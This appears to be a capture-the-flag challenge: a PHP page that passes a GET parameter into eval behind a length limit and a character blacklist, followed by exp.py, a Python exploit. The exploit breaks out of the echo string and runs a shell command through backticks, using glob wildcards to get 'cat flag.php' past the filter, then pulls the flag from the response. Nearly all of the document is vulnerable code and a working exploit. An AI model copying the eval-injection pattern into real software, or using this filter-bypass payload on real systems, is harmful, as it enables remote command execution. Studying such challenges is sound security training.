<?php
error_reporting(0);
highlight_file(__FILE__);
//flag is located in flag.php
if( isset($_GET['a']) ){
$a = $_GET['a'];
if( strlen($a)>27 ){
die(strval(strlen($a)) . " Long.");
}
if( preg_match("/[A-Zb-z0-9_$.&;|^~![\](){}\$@\*]+/", $a) ){
die("NO.");
}
eval("echo '" . $a ."';");
}
?> exp.py
#-*-codeing = utf-8 -*-
import requests
import re
url='url'
exp='\'?><?=`/???/?a? ??a?????`?>'
#cat flag.php
res = requests.get(url+'?a='+exp)
flag = re.findall("flag{.*",res.text)
print(flag)